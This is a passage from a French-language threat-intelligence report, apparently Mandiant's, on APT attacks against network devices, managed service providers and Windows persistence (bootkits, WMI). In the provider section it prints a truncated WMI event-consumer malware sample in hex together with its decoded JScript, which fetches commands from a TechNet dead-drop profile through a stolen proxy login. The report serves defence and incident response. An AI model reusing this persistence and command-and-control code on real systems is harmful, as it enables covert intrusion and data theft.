Cibler des populations spécifiquesL'accès à de grandes quantités d'informations d'identification personnelle peut aider un État à identifier et surveiller les personnes qui présentent un intérêt pour lui. Nous avons précédemment observé des cas de pirates chinois ciblant des dissidents, des minorités, des journalistes étrangers, des personnels d'ONG et d'autres individus considérés comme une menace pour l'image et la légitimité du Parti communiste.

Détection et élimination de menaces ciblées grâce à des contrôles de sécurité améliorés

La lutte contre les menaces ciblées nécessite l'appui de l'équipe de direction, des politiques et procédures efficaces ainsi que des contrôles de prévention et de détection. Dès lors qu'il est bien appliqué, un dispositif de défense en profondeur permet aux entreprises de réduire les risques auxquels sont exposées leurs données sensibles, en l'occurrence les informations d'identification personnelle. Les contrôles suivants sont à considérer comme un cadre directeur commun aux entreprises victimes de vol de données PII :

Localisation des informations critiquesPour prendre les bonnes décisions en matière de cryptage, de segmentation réseau et de restriction des droits d'utilisateur (trois éléments au cœur de la sécurité informatique), il faut avant tout savoir où les informations critiques résident au sein de l'environnement.

Cryptage des informations sensibles stockées dans les bases de donnéesLes entreprises doivent envisager d'appliquer un cryptage transparent des bases de données et de la couche applicative des bases hébergeant des informations sensibles.

Restriction de l'accès réseau aux serveurs de bases de donnéesDes listes de contrôle d'accès au réseau doivent être mises en œuvre pour limiter l'accès aux serveurs de bases de données. Seuls les systèmes situés sur des segments réseau fiables et étroitement surveillés doivent être autorisés à établir des connexions directes aux bases de données.

Conclusion

Mandiant surveille constamment l'activité des auteurs d'attaques ciblées, notamment les changements de cap dans les données qu'ils convoitent. Nous pensons que les pirates basés en Chine vont continuer à viser et voler les informations d'identification personnelle (PII). Si leurs motivations précises sont encore floues, on peut raisonnablement supposer que cette tendance est appelée à s'affirmer et que les données PII resteront en ligne de mire.


Ces dernières années, Mandiant a observé plusieurs cas de compromission d'infrastructures réseau (routeurs, commutateurs, pare-feux, etc.) par des auteurs d'attaques avancées. Bien qu'essentiels dans les infrastructures d'entreprise, ces équipements sont souvent négligés dans les investigations des experts en interventions sur incidents, surtout si ces derniers ont identifié des backdoors ou mécanismes d'accès à distance sur d'autres systèmes.

LES ATTAQUES CIBLANT LES ÉQUIPEMENTS RÉSEAU D'ENTREPRISE

3E TENDANCE

Pourquoi les équipements réseau intéressent-ils les attaquants ?

Vu le rôle critique que ces équipements jouent au sein d'un réseau, ils représentent une cible privilégiée pour de multiples raisons. Voici quelques exemples :

• Surveillance du trafic — En exploitant des équipements réseau pour surveiller le trafic réseau intra- et inter-segments, le pirate a accès aux données de multiples ordinateurs qu'il devrait sinon compromettre un à un.

• Reconnaissance — Tout comme pour la surveillance du trafic réseau, le pirate peut utiliser l'accès au routeur et au pare-feu pour collecter des informations lui permettant de cibler plus précisément un système/réseau et de se déplacer latéralement. Il pourra notamment faire des repérages à partir de données existantes (p. ex. des tables de routage et autres) ou collecter activement des données dans le but de cartographier le réseau et les terminaux, les systèmes d'authentification et d'autres systèmes critiques, etc.

• Subversion des contrôles de sécurité — Le pirate pourra modifier ou désactiver les contrôles de sécurité des équipements réseau, par exemple ouvrir des routes ou modifier des listes de contrôle d'accès ou des règles de pare-feu pour autoriser le trafic nécessaire aux accès interactifs ou aux communications avec le serveur de commande et de contrôle (CnC). Autres éventualités : la modification ou la subversion de tunnels sécurisés ou de la segmentation, le détournement de trafic à des fins de surveillance, ou encore l'altération de sessions pour intercepter les communications dans un schéma « man-in-the-middle ».

• Persistance — L'installation d'une backdoor sur l'équipement réseau permet au pirate de bénéficier d'un accès direct au réseau.

• Perturbation — Le pirate peut modifier ou désactiver des fonctionnalités des équipements réseau afin de perturber leurs communications et provoquer un déni de service.


Les investigations des équipements réseau sont difficiles à mener, notamment en raison de l'absence d'outils spécifiques capables de détecter une compromission ou de faciliter l'analyse forensique. Lors d'une intrusion, l'analyse manuelle de ces dispositifs est aussi laborieuse qu'inefficace. En outre, la plupart des entreprises comptent plusieurs dizaines, voire plusieurs centaines d'équipements réseau, tous dotés de versions logicielles diverses et d'ensembles de règles complexes, rendant extrêmement compliquée une analyse à l'échelle de l'environnement.

Lorsqu'un attaquant a accès aux données sensibles d'un environnement, l'examen des équipements réseau n'est souvent pas considéré comme une priorité. Et bien que leur compromission nécessite souvent un degré de sophistication élevé, les attaquants savent que si elle aboutit, leurs manœuvres seront difficiles à détecter.

Exemples d'attaques contre des équipements réseau

Vous trouverez ci-dessous quelques cas d'attaques d'infrastructures réseau sur lesquels Mandiant est intervenu ces dernières années :

Modification d'images de routeur Cisco

Cet exemple décrit la compromission d'une entreprise de télécommunications. Au cours de l'intrusion, le pirate a découvert un référentiel d'images utilisées pour les routeurs Cisco sur un système de partage de fichiers interne. Il a exfiltré ces images de l'environnement, les a modifiées pour y inclure une backdoor, puis a remplacé les images d'origine par les images malveillantes sur le système de partage. Ensuite, pour brouiller les pistes lors de l'analyse forensique, il a modifié l'horodatage des images malveillantes placées dans le référentiel pour qu'il corresponde à celui des images d'origine.

Mandiant a non seulement découvert que plusieurs routeurs de l'environnement exécutaient l'image malveillante, mais également que l'attaque avait eu lieu plus de six mois avant l'investigation. Les preuves forensiques étaient insuffisantes pour

déterminer qui du pirate ou d'un des administrateurs système avait installé l'image malveillante sur les équipements. Il est toutefois possible que le pirate ait choisi de se faire le plus discret possible en attendant qu'un administrateur installe accidentellement une des images corrompues, au lieu de le faire lui-même.

Injection de script Web ciblant un concentrateur Cisco ASA VPN

Un pirate a ciblé des équipements Cisco ASA VPN par injection de script (XSS, Cross-Site Scripting) avant l'authentification, exploitant ainsi une vulnérabilité répertoriée sous l'identifiant CVE-2014-3393. Cette faille lui a permis d'insérer du code JavaScript malveillant dans le logo de la page de destination du VPN SSL de l'entreprise visée. Ce script malveillant interceptait incognito les identifiants des utilisateurs qui ouvraient une session VPN SSL à partir d'un navigateur Web, puis les renvoyaient vers un site contrôlé par l'auteur de l'attaque. Faute de deuxième facteur d'authentification pour la connexion VPN, le pirate a pu utiliser les identifiants collectés par le script pour se connecter au réseau de l'entreprise via le VPN.

Au cours des tests destinés à diagnostiquer la gravité du problème, Mandiant a découvert que même une authentification à deux facteurs n'aurait pas pu empêcher la compromission du concentrateur Cisco ASA. Nous avons pu collecter les informations de session, ainsi que des identifiants légitimes, ce qui nous a permis d'exécuter une attaque par relecture du trafic.

Backdoors sur routeurs Cisco IOS : SYNful Knock

En 2015, Mandiant a publié un rapport qui détaille la modification de routeurs Cisco IOS installés en bordure de réseau à l'aide d'un implant appelé SYNful Knock. Cet implant consiste en une image modifiée de Cisco IOS qui permet à l'auteur de l'attaque de charger sur le routeur des modules contenant de nouvelles fonctionnalités directement depuis Internet. La modification des images de routeur découverte par Mandiant perdurait même après un redémarrage et permettait au pirate de se connecter aux équipements compromis à partir d'Internet.

http://www2.fireeye.com/rs/848-DID-242/images/rpt-synful-knock.pdf


Mandiant a confirmé l'existence de 14 implants de routeur SYNful Knock sur des infrastructures exposées à Internet dans quatre pays : Ukraine, Philippines, Mexique et Inde. Des recherches complémentaires menées par des tiers ont établi que de nombreux autres routeurs avaient été compromis aux quatre coins du monde.

Recommandations tactiques

Comme pour les autres systèmes d'un environnement, la surveillance de l'intégrité et la gestion des authentifications constituent deux aspects primordiaux de la prévention ou de la détection des attaques ciblant les équipements réseau. Mandiant recommande aux entreprises d'appliquer les mesures suivantes pour mieux prévenir et détecter d'éventuelles compromissions de leurs équipements réseau, et rétablir une situation normale :

• Authentification forte – Mettez en œuvre une authentification multifacteur pour l'accès des administrateurs aux équipements réseau. Utilisez un système à base de jetons matériels, de SMS ou d'une application pour smartphone plutôt qu'une solution de jeton logiciel basée sur le poste de travail.

• Vérification de l'intégrité des systèmes – Contrôlez régulièrement les configurations actives sur les équipements réseau et assurez-vous qu'elles correspondent bien à l'image de démarrage. Les attaquants peuvent compromettre l'image en cours d'exécution d'un équipement réseau en lui appliquant des modifications qui, parfois, disparaissent après un redémarrage.

• Gestion du changement – Assurez-vous que les administrateurs réseau tiennent à jour des journaux détaillés des modifications apportées à l'infrastructure des équipements réseau. À cette fin, il est possible de définir une procédure de gestion du changement et de mettre en œuvre un système de gestion des tickets de modification.

• Gestion des correctifs – Veillez à ce que les équipements soient pourvus des derniers correctifs publiés par le fournisseur. Téléchargez toujours les correctifs directement sur le site du fournisseur et, avant de les appliquer aux équipements, vérifiez leurs hachages ou signatures numériques.

• Restauration – Conservez les configurations connues comme fiables dans un emplacement sécurisé, de sorte à pouvoir les utiliser pour rétablir une situation normale après une compromission. Vérifiez régulièrement les images installées sur les équipements réseau pour vous assurer qu'elles n'ont pas été modifiées.

• Surveillance – Gardez un œil sur les équipements dont d'éventuels problèmes de performances pourraient indiquer une compromission.


RÉTROSPECTIVE : QUAND LES TENDANCES S'INSTALLENT DANS LA CONSTANCE

D'après les observations de Mandiant, des groupes spécialisés dans les attaques avancées continuent à utiliser les infrastructures de fournisseurs ou sous-traitants comme porte d'entrée vers les réseaux de nos clients. Cela vous évoque sans doute quelque chose. En 2013, le rapport M-Trends de Mandiant2 contenait en effet un article et une étude de cas décrivant comment des groupes APT « s'interposaient » de plus en plus dans les relations d'externalisation pour s'introduire dans les environnements des donneurs d'ordres. Cette tendance s'est amplifiée et le phénomène est probablement encore plus répandu aujourd'hui, dans la mesure où un nombre croissant d'entreprises dépendent toujours plus de leurs fournisseurs et sous-traitants.

2 M-Trends 2013 (https://dl.mandiant.com/EE/library/M-Trends_2013.pdf)

FOURNISSEURS DE SERVICES : UNE PORTE D'ENTRÉE VERS LEURS CLIENTS

https://dl.mandiant.com/EE/library/M-Trends_2013.pdf


Compromission via un fournisseur de services externalisés

Le fournisseur de services a accès au réseau du client via un tunnel VPN site-à-site. Des restrictions d'accès limitées sont en place.

L'attaquant compromet le fournisseur de services.

Fournisseur de services Réseau du client

Compromission

1

2

L'attaquant exploite le tunnel VPN site-à-site et compromet le client à partir du réseau du fournisseur de services.

3

La sécurité de votre réseau est tributaire de celle de vos fournisseurs de services. Assurez-vous que votre entreprise comprend parfaitement leur dispositif de sécurité, et imposez-leur des politiques d'accès au réseau aussi rigoureuses que celles de vos propres collaborateurs.

Ce qu'il faut retenir :


Tout au long de l'année 2015, nous avons observé plusieurs formes d'infiltration d'entreprises par la compromission de leurs fournisseurs de services. Nous avons ainsi enquêté sur des affaires dans lesquelles des cybercriminels ont utilisé des identifiants volés à des fournisseurs de services pour accéder à des réseaux d'entreprises des secteurs hôtelier et de la grande distribution, et y dérober des données de carte de paiement. Cette tendance, largement soulignée ces dernières années, ne montre aucun signe de fléchissement.

Nous avons également recensé des cas où les attaquants se sont procurés des identifiants traînant dans des fichiers non sécurisés sur les systèmes de l'entreprise victime. S'il est vrai qu'ils avaient déjà infiltré l'environnement de leur cible, ce sont les identifiants du fournisseur qui leur ont permis d'interagir avec le segment réseau qui les intéressait. Lors d'une de nos missions, l'attaquant avait découvert une feuille de calcul contenant des noms d'utilisateur et mots de passe donnant accès à un segment réseau protégé. Malheureusement, ce segment permettait d'accéder à distance à l'environnement via un système d'authentification à un seul facteur. Pour s'authentifier auprès de l'environnement segmenté, il a donc suffi à l'attaquant d'utiliser les identifiants en sa possession : il a ensuite pu accéder aux systèmes de traitement des données des titulaires de carte et collecter ces données de façon continue, jusqu'à ce que nous parvenions à endiguer l'incident.

Parmi les attaques par fournisseur interposé observées l'an dernier, les plus dévastatrices concernaient le secteur de l'infogérance. En collaboration avec ces fournisseurs informatiques et leurs clients, nous avons identifié plusieurs groupes APT qui étaient parvenus à s'implanter sur diverses infrastructures d'infogérance pendant plus de deux ans, et jusqu'à cinq ans dans l'un des cas. Solidement enracinés dans ces environnements, ils ont pu les exploiter pour accéder comme bon leur semblait aux entreprises clientes de ces services. Si leurs objectifs variaient en fonction du client ciblé, les attaquants cherchaient essentiellement à voler des données sensibles aux entreprises, tout en maintenant leur présence sur l'infrastructure du fournisseur pour s'orienter vers de nouvelles proies.

Nos investigations ont révélé qu'afin de conserver cet accès, ils s'introduisaient dans les serveurs de gestion des fournisseurs de services d'infogérance, serveurs sur lesquels repose l'infrastructure des clients. Ensuite, ils menaient des opérations de reconnaissance et collectaient des identifiants leur permettant d'accéder aux systèmes des entreprises ciblées. Occasionnellement, ils déployaient des malwares sur les réseaux des clients (cibles) pour s'y implanter à long terme, mais ils utilisaient essentiellement les privilèges d'administrateur des fournisseurs pour se déplacer incognito sur ces réseaux.

Lors d'une enquête récente, Mandiant a identifié un attaquant qui utilisait un malware basé sur WMI3 pour s'installer durablement aussi bien sur le réseau d'un fournisseur de services d'infogérance que sur ceux de plusieurs de ses clients. L'utilisation de WMI à des fins de persistance est considérée comme une technique intéressante qui lui vaut d'être de plus en plus prisée des auteurs d'attaques avancées. Son identification dans des attaques visant des fournisseurs de services d'infogérance marque par conséquent la convergence de deux tendances. L'année dernière, le rapport M-Trends de Mandiant se penchait sur WMI et décrivait comment les attaquants l'exploitaient pour se déplacer latéralement et s'implanter durablement dans un environnent. Par ailleurs, en août 20154, l'équipe FLARE de FireEye a publié un livre blanc qui examine de manière approfondie l'architecture de WMI, révèle des cas réels d'exploitation de WMI par des attaquants, décrit les stratégies de neutralisation des attaques utilisant WMI et explique comment analyser son référentiel afin d'identifier les artefacts numériques.

Ce malware était unique, non seulement parce qu'il était basé sur WMI, mais également parce qu'il exploitait une technique de résolution de boîte aux lettres morte (dead drop), qui communiquait avec des profils malveillants créés sur le portail Web Microsoft TechNet. Cette technique a été décrite par FireEye dans un rapport de veille des menaces publié en mai 2015 (Hiding in Plain Sight: FireEye and Microsoft Expose Chinese APT Group’s Obfuscation Tactic).

3 M-Trends 2015 – Présentation de WMI (https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf)4 Windows Management Instrumentation (WMI) Offense, Defense, and Forensics (https://www.fireeye.com/blog/threat-research/2015/08/windows_managementi.html)

https://www.fireeye.com/blog/threat-research/2015/05/hiding_in_plain_sigh.html



https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf

https://www.fireeye.com/blog/threat-research/2015/08/windows_managementi.html


Les pirates aguerris peuvent utiliser WMI à pratiquement chaque étape du cycle d'une attaque ciblée. Par défaut, l'utilisation de WMI laisse peu de traces identifiables par les experts en analyse forensique, à moins qu'ils ne sachent où chercher. Dans ce cas précis, WMI était employé non seulement pour passer à travers les mailles des logiciels antivirus classiques, mais également pour contourner le proxy Web de la victime grâce à des identifiants codés en dur volés à un utilisateur des services d'infogérance. Le fragment de code suivant illustre un malware basé sur WMI découvert récemment lors d'une enquête chez un fournisseur de services d'infogérance.

instance of ActiveScriptEventConsumer as $Consumer

{

Name = “MST.ConsumerScripts”;

ScriptingEngine = “JScript”;

ScriptText = “oFS = new ActiveXObject(‘Scripting.FileSystemObject’);JF=’C:/Windows/Temp/%Mutex%’;oMutexFile =

null;try{oMutexFile = oFS.OpenTextFile(JF, 2, true);}catch(e){}”

“CoreCode = ‘ %6D%61%73%74%65%72%55%72%6C%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%73%6F%63%69%61%6

C%2E%74%65%63%68%6E%65%74%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D%2F%50%72%6F%66%69%6C%65%2F%3C%52%45%44%41%43

%54%45%44%3E%27%5D%3B%20%76%61%72%20%50%72%6F%78%79%20%3D%20%5B%3C%50%52%4F%58%59%5F%52%45%44%41%43%54%45%44%3E%

3A%38%30%27%2C%27%3C%49%54%4F%5F%55%53%45%52%3E%27%2C%27%3C%49%54%4F%5F%55%53%45%52%5F%50%41%53%53%57%4F%52%44%3

E%27%5D%3B%20%63%61%6C%6C%55%72%6C%20%3D%20%27%27%3B%20%76%41%75%74%68%20%3D%20%27%27%3B%20%67%53%6C%65%65%70%20

%3D%20%31%30%30%30%20%2A%20%36%30%20%2A%20%37%32%3B%20%76%53%6C%65%65%70%20%3D%20%35%30%30%3B%20%58%4D%4C%20%3D%20

%6E%65%77%20%41%63%74%69%76%65%58%4F%62%6A%65%63%74%28%27%4D%53%58%4D%4C%32%2E%53%65%72%76%65%72%58%4D%4C%48%54

%54%50%2E%36%2E%30%27%29%3B%20%6F%57%53%20%3D%20%6E%65%77%20%41%63%74%69%76%65%58%4F%62%6A%65%63%74%28%27%57%5

3%63%72%69%70%74%2E%53%68%65%6C%6C%27%29%3B%20%6F%4E%74%20%3D%20%6E%65%77%20%41%63%74%69%76%65%58%4F%62%6A%65%

63%74%28%27%57%53%63%72%69%70%74%2E%4E%65%74%77%6F%72%6B%27%29%3B%20%6C%6F%63%61%74%6F%72%20%3D%20%6E%65%77%20

%41%63%74%69%76%65%58%4F%62%6A%65%63%74%28%27%57%62%65%6D%53%63%72%69%70%74%69%6E%67%2E%53%57%62%65%6D%4C%6F%63%-

61%74%6F%72%27%29%3B%20%6F%57%4D%49%20%3D%20%6C%6F%63%61%74%6F%72%2E%43%6F%6E%6E%65%63%74%53%65%72%76%65%72%28%27%

2E%27%2C%20%27%72%6F%6F%74%5C%5C%63%69%6D%76%32%27%29%3B%20%6F%46%53%20%3D%20%6E%65%77%20%41%63%74%69%76%65%58%4F6

%26%A6%56%37%42%82%75%36%37%26%97%07%46%96E%67%2E%46%69%6C%65%53%79%73%74%65%6D%4F%62%6A%65%63%74%27%29%3B%20

%76%61%72%20%42%61%73%65%36%34%20%3D%20%7B%20%5F%6B%65%79%53%74%72%20%3A%20%22%41%42%43%44%45%46%47%48%49%4A%4B%4C%

4D%4E%4F%50%51%52%53%54%55%56%57%58%59%5A%61%62%63%64%65%66%67%68%69%6A%6B%6C%6D%6E%6F%70%71%72%73%74%75%76%77%

78%79%7A%30%31%32%33%34%35%36%37%38%39%2B%2F%3D%22%2C%20%65%6E%63%6F%64%65%20%3A%20%66%75%6E%63%74%69%6F%6E%20

%28%69%6E%70%75%74%29%20%7B%20%76%61%72%20%6F%75%74%70%75%74%20%3D%20%22%22%3B%20%76%61%72%20%63%68%72%31%2C%20

%63%68%72%32%2C%20%63%68%72%33%2C%20%65%6E%63%31%2C%20%65%6E%63%32%2C%20%65%6E%63%33%2C%20%65%6E%63%34%3B%20%76%61%7-

2%20%69%20%3D%20%30%3B%20%69%6E%70%75%74%20%3D%20%42%61%73%65%36%34%2E%5F%75%74%66%38%5F%65%6E%63%6F%64%65%28%69%6E

%70%75%74%29%3B%20%77%68%69%6C%65%20%28%69%20%3C%20%69%6E%70%75%74%2E%6C%65%6E%67%74%68%29%20%7B%20%63%68%72%31%20

%3D%20%69%6E%70%75%74%2E%63%68%61%72%43%6F%64%65%41%74%28%69%2B%2B%29%3B%20%63%68%72%32%20%3D%20%69%6E%70%75%74%2E%63

%68%61%72%43%6F%64%65%41%74%28%69%2B%2B%29%3B%20%63%68%72%33%20%3D

La partie du script codée en hexadécimal dans ce fichier apparaît sous la forme du texte ci-dessous une fois décodée. Ce texte codé contenait l'URL à partir de laquelle le malware téléchargeait les commandes et l'adresse codée en dur d'un proxy de la victime, ainsi que les identifiants d'authentification qui avaient été volés au fournisseur de services.

masterUrl = [‘http://social.technet.microsoft.com/Profile/<REDACTED>’]; var Proxy = [<PROXY_REDACTED>:80’,’<ITO_US-

ER>’,’<ITO_USER_PASSWORD>’]; callUrl = ‘’; vAuth = ‘’; gSleep = 1000 * 60 * 72; vSleep = 500; XML = new ActiveXOb-

ject(‘MSXML2.ServerXMLHTTP.6.0’); oWS = new ActiveXObject(‘WScript.Shell’); oNt = new ActiveXObject(‘WScript.Net-

work’); locator = new ActiveXObject(‘WbemScripting.SWbemLocator’); oWMI = locator.ConnectServer(‘.’, ‘root\\cimv2’);

oFS = new ActiveXObject(‘Scripting.FileSystemObject’); var Base64 = { _keyStr : “ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi-

jklmnopqrstuvwxyz0123456789+/=”, encode : function (input) { var output = “”; var chr1, chr2, chr3, enc1, enc2, enc3,

enc4; var i = 0; input = Base64._utf8_encode(input); while (i < input.length) { chr1 = input.charCodeAt(i++); chr2 =

input.charCodeAt(i++); chr3 =


Le schéma suivant illustre comment les groupes APT s'implantent à long terme dans les infrastructures d'infogérance.

Figure 2 — Schéma d'une attaque

Serveur CnC Microsoft TechNet

Auteur d'attaque

Backdoor

Zone démilitarisée du fournisseur

Compte d'admin. piraté du fournisseur

Cheval de Troie d'accès WMI à distance

Entreprise A Entreprise B Entreprise C

Hôte compromis Hôte compromis Hôte compromis

Données sensibles Données sensibles Cheval de Troie d'accès WMI

à distance


La compromission des fournisseurs de services d'infogérance constitue une tendance significative dans la mesure où elle permet aux groupes APT de raccourcir le cycle des attaques ciblées. Lorsqu'un attaquant infiltre le réseau d'une entreprise ciblée par le biais de l'infrastructure de services compromise, il saute les trois premières phases du cycle. Pas besoin de créer un exploit ni d'envoyer un e-mail de spear phishing puisqu'il dispose déjà de privilèges élevés qui lui procurent un accès illimité. Ce raccourci lui permet de mener des opérations de grande envergure plus efficacement, tout en accomplissant sa mission à moindre effort. La compromission des fournisseurs de services d'infogérance et l'élimination consécutive de plusieurs phases du cycle rendent la prévention et la détection des attaques ciblées extrêmement difficiles. Tout laisse à penser que cette tendance va perdurer jusqu'à ce que les coûts d'exploitation de l'infrastructure des fournisseurs comme point d'attaque initial deviennent rédhibitoires. Les pirates trouveront alors une méthode plus simple pour atteindre leurs objectifs.

Recommandations

Les grandes entreprises ont longtemps été réticentes à l'idée de migrer leur infrastructure informatique vers le cloud public en raison des risques de sécurité perçus. Comme le prouvent nos enquêtes, les risques associés à l'externalisation des services informatiques sont sans doute aussi inquiétants. Gardez à l'esprit les recommandations suivantes si vous externalisez, ou envisagez d'externaliser, votre informatique à un fournisseur de services d'infogérance :

Mise en œuvre d'une authentification multifacteur et de serveurs de rebondDéployez des mécanismes d'authentification multifacteur pour tous les fournisseurs de services

externalisés, et si possible, déviez l'accès des fournisseurs à l'environnement réseau vers un serveur de rebond. Si un attaquant est actif sur le réseau d'un fournisseur de services, une authentification multifacteur associée à un serveur de rebond dédié peut l'empêcher de voler des identifiants pour accéder directement au réseau d'un client final (cible). En outre, la solution d'authentification multifacteur choisie doit être liée au compte Active Directory d'un utilisateur correspondant et ne doit pas être valable pour les autres comptes. Les jetons matériels ou les jetons sur téléphones mobiles (tels ceux envoyés par SMS) constituent des options plus sûres. Veillez à surveiller activement les connexions distantes pour identifier toute activité suspecte.

Surveillance de l'utilisation des comptes avec privilègesSuivez de près l'utilisation de ces comptes, y compris ceux associés aux fournisseurs de services. En effet, les attaquants ciblent notamment les comptes d'administrateur local, d'administrateur de domaine et de service. Ces comptes présentent un intérêt particulier sur les systèmes de gestion des services d'infogérance puisqu'ils peuvent être utilisés pour accéder au réseau de plusieurs clients/cibles. Bien qu'il existe divers produits/solutions de gestion et de surveillance des comptes avec privilèges, il est parfois beaucoup plus simple d'envoyer à tous les détenteurs de ces comptes un rapport journalier répertoriant toutes leurs connexions authentifiées. De cette manière, toute activité suspecte n'échappera pas à la perspicacité des administrateurs.

Coût total de possessionUne entreprise qui envisage de faire appel à un fournisseur de services évalue généralement le coût total de possession (TCO) dans le cadre de l'analyse coût-avantage de

Figure 3 — Cycle de vie d'une attaque ciblée

l'externalisation. Pour un calcul précis du TCO, il est impératif de savoir quels types de mesures de sécurité réseau le fournisseur propose et comment il protège sa propre infrastructure contre des attaquants déterminés. Assurez-vous que le fournisseur a mis en place des mécanismes de détection et d'intervention à la fois sur les hôtes et sur le réseau. Vérifiez qu'il surveille activement les systèmes à la recherche d'indicateurs de compromission, et qu'il résout tout incident de façon appropriée. Intégrez le coût des compromissions de données dans votre modèle de calcul du coût total de possession.

Plan d'intervention sur incidentsAssurez-vous que votre plan d'intervention sur incidents décrit les procédures de communication avec vos fournisseurs de services pendant un incident. Dans le secteur de l'infogérance en particulier, les fournisseurs appliquent généralement des procédures rigoureuses en matière de conduite du changement. Définissez un processus permettant de gérer efficacement ces contrôles pendant un incident, de sorte que votre équipe d'intervention puisse être aussi agile que l'adversaire. Faites appel à des conseillers juridiques qui vous aideront à mieux gérer les risques pendant un incident. Abordez toutefois les questions juridiques avec prudence dans vos communications avec le fournisseur de services d'infogérance (évitez notamment de rejeter la responsabilité de la compromission sur lui pendant l'intervention), pour ne pas compromettre la coopération avec les responsables de la gestion de votre infrastructure. Un conseiller juridique vous aidera à concilier obligations légales et nécessité de conserver de bonnes relations professionnelles avec le fournisseur de services, en vue de favoriser une résolution rapide et efficace de l'incident.

RÉTROSPECTIVE : QUAND LES TENDANCES S'INSTALLENT DANS LA CONSTANCE PERSISTANCE SOUS WINDOWS


Depuis plus de 10 ans, Mandiant suit de près les auteurs d'attaques les plus sophistiquées, ce qui lui donne une vision incomparable de l'évolution de leurs outils, tactiques et procédures. Les mécanismes de persistance qu'ils emploient pour maintenir leurs malwares opérationnels après le redémarrage d'un système compromis sont particulièrement intéressants. Pour les enquêteurs, comprendre la façon dont certains malwares s'enracinent offre un excellent moyen d'établir la compromission d'autres systèmes éventuellement touchés.

Par le passé, Mandiant a pu observer un large éventail de techniques de persistance qui privilégiaient généralement la stabilité et la simplicité par rapport à la furtivité. Les plus simplistes consistaient à créer ou modifier un service Windows ou à ajouter des fichiers malveillants aux clés Run du registre. Le tableau 1 contient divers exemples de techniques de persistance courantes identifiées et décrites par Mandiant dans des rapports M-Trends précédents.

MÉCANISME DE PERSISTANCE

DESCRIPTION

Services Windows Un service Windows est un programme configuré pour se lancer au démarrage du système et s'exécuter en arrière-plan. Pour s'implanter durablement dans le système infiltré, les attaquants créent souvent un nouveau service Windows ou détournent un service existant.

Registre Windows Le registre Windows offre d'innombrables façons d'exécuter certains fichiers au démarrage du système.

Détournement de l'ordre de recherche des DLL

En exploitant l'ordre de recherche des DLL (Dynamic-Link Library), les pirates peuvent faire en sorte que des fichiers malveillants portant un nom spécifique et situés dans un emplacement précis soient chargés par des applications légitimes mais vulnérables.

Modification des objets Stratégie de groupe (GPO)

En modifiant des objets GPO qui gèrent les connexions utilisateur, les pirates peuvent ordonner au système de lancer un malware lors de la connexion d'un utilisateur.

Utilisation d'objets COM Les objets COM (Common Object Model) fournissent un mécanisme permettant aux applications de communiquer et d'interagir. Les pirates peuvent les détourner pour qu'un malware soit chargé lorsqu'une autre application tente d'interagir avec l'objet.

Modification de fichiers binaires système existants

Les pirates peuvent modifier des fichiers binaires système légitimes existants pour y inclure du code malveillant conçu pour lancer un malware sans entraver le fonctionnement prévu du système.

Tâches planifiées Windows Les pirates peuvent utiliser des tâches planifiées Windows pour exécuter des fichiers malveillants selon des déclencheurs système, tels qu'une heure spécifique ou le démarrage du système.

Windows Management Instrumentation (WMI)

WMI fournit un cadre permettant de déclencher l'exécution d'applications en fonction de modifications de l'état d'objets spécifiés. À l'instar des tâches planifiées, il peut utiliser des déclencheurs comme une heure spécifique ou le démarrage du système.

Packages de sécurité Windows malveillants

Les packages de sécurité Windows sont des jeux de DLL chargés par Windows Local Security Authority (LSA) au démarrage du système. Un pirate peut ajouter un package de sécurité malveillant conçu pour rester opérationnel même après un redémarrage du système.

Tableau 1 — Mécanismes de persistance courants identifiés par le passé



Mécanismes de persistance récents

Bien que les méthodes de persistance éprouvées offrent aux auteurs de malwares la stabilité qu'ils souhaitent, de nouvelles techniques, axées sur la furtivité et la dissimulation, continuent de voir le jour. Mandiant en a identifié plusieurs dans le cadre d'enquêtes menées l'année dernière. En voici quelques-unes, particulièrement intéressantes :

Bootkits de secteur de démarrage principal et de secteur de démarrage de volumeMandiant a constaté que des pirates modifiaient le secteur de démarrage principal (MBR) et le secteur de démarrage de volume (VBR) pour que du code malveillant s'exécute avant même que le système d'exploitation soit chargé. C'est ce que l'on appelle la création d'un « bootkit ». Sur un système Windows, le secteur de démarrage principal stocke des informations sur l'organisation des partitions (qui contiennent les systèmes de fichiers) sur le disque. Il identifie les partitions actives sur le disque et transmet ensuite le contrôle au secteur de démarrage de volume. Ce dernier contient du code qui charge le système d'exploitation. La figure 1 présente une version simplifiée du processus de démarrage.

Figure 1 — Processus de démarrage simplifié

MBR VBR Partition 0Espace

non alloué

1 2

Bootkit de secteur de démarrage principal (MBR)Un bootkit de secteur de démarrage principal identifié par Mandiant et désigné en interne sous le nom de RockBoot cible spécifiquement les systèmes d'exploitation Windows XP, Windows Server 2003, Windows 7 et Windows Server 2008/2012. Il détourne le processus de démarrage lorsque le BIOS transmet le contrôle au secteur de démarrage principal. Cette méthode permet de contourner les techniques de prévention et détection classiques dans la mesure où la plupart des technologies n'analysent pas le secteur de démarrage principal. Le pirate installe ce bootkit à l'aide d'un exécutable compressé 64 bits. Lorsqu'il exécute le programme d'installation du bootkit, il fournit le nom de fichier d'une backdoor dont il souhaite assurer la persistance après des redémarrages du système. Le programme d'installation place ensuite un pilote sur le disque, qui devient ainsi accessible en lecture et écriture à l'attaquant. Au final, ce niveau de manipulation du disque permet à l'attaquant d'installer le bootkit. Pendant l'installation, le malware se reproduit sur tous les disques logiques formatés avec NTFS et tente de stocker une version codée de la backdoor (répertoriée dans la ligne de commande) à deux endroits : une fois sous la forme d'un fichier sur le disque et une fois dans les secteurs non alloués vers l'extrémité du système de fichiers. La backdoor stockée dans les secteurs non alloués sert de relais en cas de suppression de la version fichier sur disque.


Figure 2 — Schéma simplifié de l'exécution du bootkit de secteur de démarrage principal

Le programme d'installation vérifie que les deux copies de la backdoor sont stockées sur le disque, puis installe le secteur de démarrage principal modifié. Il crée d'abord une copie codée du secteur légitime et l'écrit dans un emplacement non alloué du disque physique. Ensuite, il copie des sections du secteur malveillant sur le secteur légitime, préservant ainsi la table de partitionnement originale et les messages d'erreur. Le malware est programmé de telle sorte que le secteur de démarrage principal est uniquement modifié sur le disque physique contenant le système de fichiers où se trouve %WinDir% (qui indique l'endroit où est installé le système d'exploitation Windows) et qu'il n'a pas été modifié précédemment.

